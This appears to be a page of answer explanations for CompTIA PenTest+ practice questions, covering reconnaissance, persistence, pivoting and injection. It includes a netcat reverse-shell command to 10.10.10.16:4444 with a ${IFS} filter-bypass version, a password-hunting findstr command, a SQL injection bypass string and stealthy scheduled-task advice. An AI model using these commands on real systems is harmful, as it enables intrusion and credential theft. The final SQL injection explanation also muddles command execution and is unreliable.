Free CompTIA PT0-003 Practice Questions 2026 - Page 8

Explanation:

This question asks what the tester should do first when developing a phishing campaign, given that spear phishing is authorized.

Understanding spear phishing:
Spear phishing is a targeted form of phishing that focuses on specific individuals or departments within an organization. Unlike broad, generic phishing, spear phishing requires reconnaissance to personalize the messages and make them convincing.

The tester needs to gather information about potential targets before crafting the emails.

Analysis of Each Option:

A. Shoulder surfing
This is a physical social engineering technique where the tester observes someone typing passwords or viewing sensitive information. This would occur during an on-site assessment, not as the first step in developing a phishing campaign. It is also not typically authorized in remote engagements. Incorrect.

B. Recon-ng
Recon-ng is a reconnaissance framework that automates OSINT gathering from multiple sources such as search engines, DNS records, and social platforms. It can collect email addresses and employee details useful for spear phishing. While useful, it is a tool used after identifying initial targets. Not the very first step.

C. Social media
Platforms like LinkedIn, Twitter, and Facebook are excellent sources for identifying employees, their job roles, responsibilities, interests, and reporting structure. This information is critical for crafting believable spear phishing messages. Reviewing social media profiles is commonly the first step in targeted reconnaissance. Correct.

D. Password dumps
Searching breached credential databases can help with credential stuffing or validation later. However, this is not typically the first step in building a phishing campaign. It does not help identify or profile targets initially. Incorrect.

Why Social Media Is First:
A typical spear phishing workflow begins with:
Identifying employees and organizational structure
Understanding roles and responsibilities
Gathering contextual information for personalization

Social media provides this foundational intelligence. Automated tools like Recon-ng may be used afterward to scale and expand the data collection.

Conclusion:
The tester should begin by researching social media to identify potential targets and gather information necessary to personalize the spear phishing campaign.

Explanation:

Maintaining access after rebooting the compromised system requires a persistence mechanism — something that automatically re-establishes a connection or executes malicious code every time the system starts up or a user logs in.

Creating a scheduled task (using schtasks.exe on Windows or cron/at on Linux) is one of the most reliable, widely used, and stealthy persistence techniques in penetration testing and red teaming.

Why It Is the Best Choice:
Scheduled tasks survive reboots and can be configured to run:
At system startup (/SC ONSTART)
At user logon (/SC ONLOGON)
Daily or weekly schedules
As SYSTEM or the current user

It can launch a reverse shell, download-and-execute payload, run a beacon, or re-establish command-and-control automatically.
It uses a native Windows utility (schtasks.exe), making it a living-off-the-land technique that does not require dropping additional tools.
It can be made stealthy by using legitimate-looking names such as “WindowsUpdateCheck” and running hidden.

This is a classic persistence technique covered in PT0-003 objectives.

Why the Other Options Are Incorrect:

A. Establishing a reverse shell
A reverse shell provides temporary remote access. However, once the system reboots or the process is terminated, the connection is lost. It does not automatically restart after reboot unless combined with a persistence mechanism. Not persistent by itself.

B. Executing a process injection attack
Process injection (such as DLL injection or process hollowing) is used for execution and defense evasion. It allows malicious code to run within another process’s memory but does not survive a reboot unless paired with a persistence mechanism. Not persistence on its own.

D. Performing a credential-dumping attack
Credential dumping extracts password hashes, Kerberos tickets, or plaintext credentials for lateral movement or privilege escalation. It provides access opportunities but does not maintain access after reboot. This is credential access, not persistence.

Key Learning Point:
Scheduled tasks are one of the most common and effective persistence techniques. They are frequently contrasted with non-persistent methods like reverse shells and process injection in certification exams.

Conclusion:
To maintain access after rebooting the system, the best technique among the options is creating a scheduled task.

Explanation:

Logical Progression:
Once email addresses (especially administrative ones like admin@acme.com) have been harvested during the reconnaissance phase, the most direct next step is to use them as usernames for authentication-based attacks.
Attack Vectors:
These emails allow the tester to launch Password Spraying, Brute Force, or Credential Stuffing attacks against external-facing portals such as VPNs, Office 365, or webmail. If successful, the tester gains a valid set of credentials, leading directly to unauthorized access to the internal network or cloud environment.
Target Selection:
Administrative accounts are high-value targets because they often possess elevated privileges, making them the primary focus for gaining a foothold.

Why other options are incorrect

❌ B. Exposure of sensitive servers to the internet:
While finding emails is a form of exposure, it does not confirm that servers (like databases or internal file shares) are directly reachable from the internet. Email harvesting is a user-centric finding, not a network infrastructure finding.

❌ C. Likelihood of SQL injection attacks:
SQL injection is a web application vulnerability found by interacting with input fields (like search bars or login forms). Knowing an email address does not increase the technical likelihood that the underlying code is vulnerable to SQLi.

❌ D. Indication of a data breach in the company:
Discovering publicly available email addresses is a standard part of OSINT and does not prove that a data breach has already occurred. Breach indication would require finding leaked passwords or sensitive internal documents.

Explanation:

The provided code is a classic Python/Scapy script used to generate a SYN flood.

Key Indicators in the Script:

flags="S"
This is the critical indicator. The "S" flag stands for SYN (Synchronize). In a normal TCP three-way handshake, the client sends a SYN, the server responds with a SYN-ACK, and the client finishes with an ACK.

sport=RandShort()
The script uses a random short integer for the source port, making each request appear to come from a different session.

loop=1
This causes the send function to execute indefinitely in a loop.

By sending a continuous stream of SYN packets without ever sending the final ACK, the attacker forces the target server to keep half-open connections in memory (the SYN backlog). Eventually, this exhausts system resources and prevents legitimate users from connecting.

Incorrect Answers:

A. MDK4
MDK4 (Murder Death Kill 4) is a standalone command-line tool designed for wireless (802.11) attacks such as deauthentication or beacon flooding. It is not a packet-crafting Python script like the one shown. Incorrect.

B. Smurf attack
A Smurf attack is an amplification-based DoS attack using ICMP traffic. It involves sending ICMP Echo Requests with a spoofed source IP address to a broadcast address. The script shown uses TCP packets, not ICMP, so it cannot be a Smurf attack. Incorrect.

C. FragAttack
FragAttacks (Fragmentation and Aggregation Attacks) refer to a set of Wi-Fi (802.11) vulnerabilities discovered in 2021 that exploit frame fragmentation behavior. The provided script performs a Layer 3/4 TCP attack, not a Layer 2 wireless fragmentation exploit. Incorrect.

Conclusion:
The script repeatedly sends TCP SYN packets with random source ports in an infinite loop, which is the definition of a SYN flood denial-of-service attack.

Explanation:

The scenario describes a penetration tester who has compromised a host and now wants to pivot through that host to enumerate other targets. Pivoting requires setting up a relay or proxy so that traffic from the tester’s machine is tunneled through the compromised host.

Analysis of the Options:

A. nmap -sT | nc -n 22
This syntax is invalid and does not properly establish a relay or pivot. It does not create a functional tunnel for enumeration. Incorrect.

B. mknod backpipe p ...
This refers to a named pipe technique sometimes used to relay traffic, but the command shown is malformed and not appropriate for reliable pivoting with Nmap. Incorrect.

C. nc -nlp 8000 | nc -n ... nmap -sT 127.0.0.1 8000
This attempts to chain Netcat listeners together, but it is not a clean or reliable method for pivoting Nmap scans through a compromised host. Incorrect.

D. proxychains nmap -sT
This is the correct answer. Proxychains forces Nmap traffic through a configured proxy (such as a SOCKS proxy running on the compromised host). This allows the tester to route scan traffic through the pivot system to reach internal targets.

Why D Is the Best Choice:
Proxychains integrates with tools such as Nmap, curl, and ssh to route traffic through a compromised system.
It enables enumeration of internal services as if scanning locally, while traffic is relayed through the pivot host.
It is a standard and recognized post-exploitation pivoting technique.

Conclusion:
The correct method for pivoting and enumerating internal systems through a compromised host is using proxychains with Nmap.

Explanation:

The question describes a host-based attack where the attacker uses software to disguise itself as legitimate software to gain unauthorized access to internal resources on a compromised system within an internal corporate network.

Rootkit — Correct Answer
A rootkit is a type of malicious software designed to hide its presence and provide privileged (often root or administrator-level) access to a system.

It achieves stealth by disguising itself and modifying operating system components such as:
Kernel modules
Processes
Files and directories
Registry entries
Network connections

This makes the malware appear legitimate or invisible to standard monitoring tools, antivirus software, and even administrators.

Common rootkit techniques include:
Hooking system calls
Hiding processes, files, and directories
Altering logs
Masquerading as legitimate drivers or services

Once installed, a rootkit enables persistent, stealthy unauthorized access and control over the host — which directly matches the scenario described.

Why the Other Options Are Incorrect:

A. On-path
An on-path (formerly man-in-the-middle) attack is network-based. It intercepts communications between systems (such as through ARP poisoning or DNS spoofing). It does not disguise malicious software on the host itself. Incorrect.

B. Logic bomb
A logic bomb is malware that triggers when a specific condition is met, such as a certain date or event. It does not focus on stealthy, ongoing access or disguising itself as legitimate software. Incorrect.

D. Buffer overflow
A buffer overflow is an exploitation technique used to execute arbitrary code or gain initial access. It is not a persistence or concealment mechanism. It does not inherently disguise malicious software. Incorrect.

Key Learning Point:
Rootkits are classic host-based persistence and defense evasion tools. They are specifically designed to mask malicious activity and maintain stealthy access on compromised systems.

Conclusion:
To disguise malicious software as legitimate and maintain unauthorized access to internal resources on a host, the correct answer is a rootkit.

Explanation: Before sharing a penetration test report, the tester should request a review from the customer’s designated contact. This person is authorized to receive sensitive findings and validate that the report aligns with the agreed scope, expectations, and communication protocols. It ensures confidentiality, proper handling of vulnerabilities, and avoids premature or unauthorized disclosure.
According to NIST SP 800-115, “All findings should be communicated through the designated point of contact to ensure proper coordination and response” (Section 5.5). The OWASP Testing Guide v4 also emphasizes that “the report should be reviewed and validated with the client before final delivery to ensure accuracy and relevance.”

This step is critical for:
Confirming technical accuracy and business impact
Ensuring findings are not misinterpreted or miscommunicated
Respecting contractual and legal boundaries

❌ A. A generative AI assistant
AI tools are not suitable for reviewing sensitive client data due to privacy, confidentiality, and data handling risks. They are not authorized parties and may inadvertently expose or misuse proprietary information.
Reference:
OWASP Top 10 Privacy Risks – “Unintended data exposure through third-party tools and services.”

❌ C. A cybersecurity industry peer
External peers are not part of the engagement and lack authorization to view client-specific findings. Sharing the report with them may violate non-disclosure agreements (NDAs) and breach client trust.
Reference:
NIST SP 800-115 – “All communications must be coordinated through the client’s designated contact to avoid unauthorized disclosure.”

❌ D. A team member
Internal peer review is useful during report drafting, but final review must be done by the client’s designated contact. Only the client can validate whether the findings are accurate, relevant, and appropriately scoped.
Reference:
OWASP Testing Guide – “The client should validate the report before it is finalized and distributed.”

Summary:
The penetration tester must prioritize client confidentiality and coordination. The designated contact ensures findings are reviewed securely, accurately, and in line with contractual obligations. This protects both the tester and the client from miscommunication, legal exposure, and operational risk.

References:
NIST SP 800-115 – Technical Guide to Information Security Testing and Assessment
OWASP Web Security Testing Guide – Reporting
OWASP Privacy Risks

Explanation:
The command findstr /SIM /C:"pass" *.txt *.cfg *.xml is a powerful search command used on Windows systems. Let's break down the syntax:
findstr: The Windows command-line utility for searching for text patterns in files (similar to grep on Linux).
/S: Search in the current directory and all subdirectories.
/I: Perform a case-insensitive search.
/M: Print only the filename if the file contains a match.
/C:"pass": Search for the literal string "pass".
*.txt *.cfg *.xml: The file extensions to search through (text files, configuration files, and XML files).
The goal is to find any file with a .txt, .cfg, or .xml extension that contains the string "pass". The string "pass" is a very common substring in words related to authentication and sensitive data, such as:
password
passwd
passphrase
userpass
encryptionpass
By running this command from a low-privilege shell, the penetration tester is attempting to discover secrets—like plaintext passwords, password hashes, or other authentication tokens—that may have been inadvertently stored in these common file types by applications or users.

Analysis of Incorrect Options
A. Configuration files:
While this is partially correct because the command is searching through configuration files (.cfg, .xml, and even .txt files often contain configuration data), this is too narrow. The objective isn't just to find configuration files; it's to search within those files (and text/XML files) for a specific type of sensitive data: secrets. The search term "pass" reveals the true intent, which goes beyond just enumerating configuration files.

B. Permissions:
The findstr command is searching file contents for a specific string. It is not interacting with or displaying file system permissions (e.g., ACLs, read/write attributes). A command like icacls or cacls would be used for enumerating permissions.

C. Virtual hosts:
Virtual hosts are typically configured in web server configuration files (like httpd.conf on Apache or within site bindings in IIS). While an XML or config file might contain virtual host settings, the specific search string "pass" is not indicative of searching for virtual host configurations. The tester would more likely be searching for strings like "VirtualHost" or "ServerName".

Reference
This technique falls under CompTIA PenTest+ (PT0-003) Domain 3.0: Attacks and Exploits, specifically related to:
Privilege Escalation: A common step after gaining initial access is to search the file system for credentials (secrets) that can be used to elevate privileges or move laterally across the network.
Data Mining: Searching for sensitive, cleartext data stored insecurely on a system.

Explanation:
The goal is to bypass a filter that is blocking the space character in a command injection attack. The space is crucial for separating the command (nc), its flags (-e), and its arguments (/bin/sh, 10.10.10.16, 4444).
${IFS} is a special shell variable in Linux and other Unix-like systems. IFS stands for Internal Field Separator. By default, this variable contains whitespace characters—including the space, tab, and newline—which the shell uses to split words.
When the shell interpreter encounters ${IFS}, it replaces it with a space (or other whitespace). This allows an attacker to use ${IFS} as a direct substitute for the space character that is being filtered. The command would be rewritten as:

nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444
From the shell's perspective after variable expansion, this is identical to the original command: nc -e /bin/sh 10.10.10.16 4444.

Analysis of Incorrect Options
B. %0a:
This is a URL-encoded representation of a newline character (\n). While a newline can sometimes be used to terminate one command and start another in certain injection contexts (like in HTTP headers or web scripts), it is not a direct substitute for a space character. It would not correctly separate the arguments within the same nc command and would likely cause a syntax error.

*C. + :
These characters are not standard substitutes for a space in shell command syntax.
+ is an operator, not a word separator.
* is a wildcard for globbing (filename expansion). Using it in place of a space would lead to the shell expanding it to filenames in the current directory, which would break the command.

D. %20:
This is the URL-encoded representation of a space character. If the application is filtering the literal space character, it is highly likely also decoding URL-encoded input before applying the filter. Therefore, submitting %20 would simply be decoded back into a space, which would then be caught by the same blocklist. It does not effectively bypass a filter that is aware of basic encoding.

Reference
This question falls under CompTIA PenTest+ (PT0-003) Domain 3.0: Attacks and Exploits, specifically objective 3.2 Given a scenario, exploit network-based vulnerabilities and 3.3 Given a scenario, exploit application-based vulnerabilities.

Explanation:
During a penetration test, if an internal application accepts unexpected user input that results in the execution of arbitrary commands, the most likely issue is SQL Injection (SQLi). SQL injection occurs when an attacker or tester manipulates input fields so that the backend interprets the input as part of a SQL query. This vulnerability allows direct interaction with the database, enabling the execution of unintended commands and access to sensitive data.
For example, if the application builds a query dynamically:
SELECT * FROM users WHERE username = ' " + userInput + " ';

An attacker could enter:
' OR '1'='1
turning the query into:
SELECT * FROM users WHERE username = '' OR '1'='1';
This always returns true, granting unauthorized access to all records. Through this method, a tester could extract sensitive data, bypass authentication, and even modify or delete records. More advanced attacks might include Union-based SQLi (to merge queries), Boolean-based blind SQLi, or Time-based blind SQLi to infer data when direct output is restricted.
SQL injection vulnerabilities arise from improper input validation, lack of parameterized queries, or insufficient output encoding. These issues are common in applications that concatenate user input directly into SQL commands. Since the scenario specifically mentions arbitrary command execution via input fields, SQL injection is the most logical exploitation technique to access sensitive data.
Mitigation involves implementing prepared statements, stored procedures, input sanitization, and principle of least privilege for database accounts.

Why the Other Options Are Incorrect
A. Logic Bomb:
A logic bomb is malicious code that activates when certain conditions are met (e.g., a specific date or event). It’s typically planted by insiders or threat actors to cause harm later. Penetration testers do not deploy destructive payloads, and this technique does not relate to exploiting unexpected input or retrieving data from a database.

C. Brute-Force Attack:
A brute-force attack involves guessing passwords or encryption keys repeatedly until the correct one is found. It targets authentication systems, not vulnerabilities in how input is handled by applications. It does not involve executing arbitrary commands or querying data from a database.

D. Cross-Site Scripting (XSS):
XSS exploits client-side input validation flaws, allowing attackers to inject malicious scripts (usually JavaScript) into web pages viewed by other users. It targets the browser, not the server-side database, and therefore cannot execute backend commands or extract sensitive data stored on the server.

References
CompTIA PenTest+ (PT0-003) Exam Objectives, Domain 3.0 – Attacks and Exploits
OWASP Top 10 (2021) – A03:2021: Injection (https://owasp.org/Top10/A03_2021-Injection/ )
NIST SP 800-115, Technical Guide to Information Security Testing and Assessment, Section 5.3.4 – Application Testing
MITRE ATT&CK Framework, Technique T1190 – Exploit Public-Facing Application
CIS Controls v8, Control 16 – Application Software Security

✅ Summary:
The vulnerability described fits SQL injection, where improper handling of user input allows execution of backend database commands to access sensitive information. Other options like logic bombs, brute-force attacks, and XSS do not allow arbitrary command execution or database data extraction. Therefore, Option B (SQL Injection) is the correct and most accurate answer.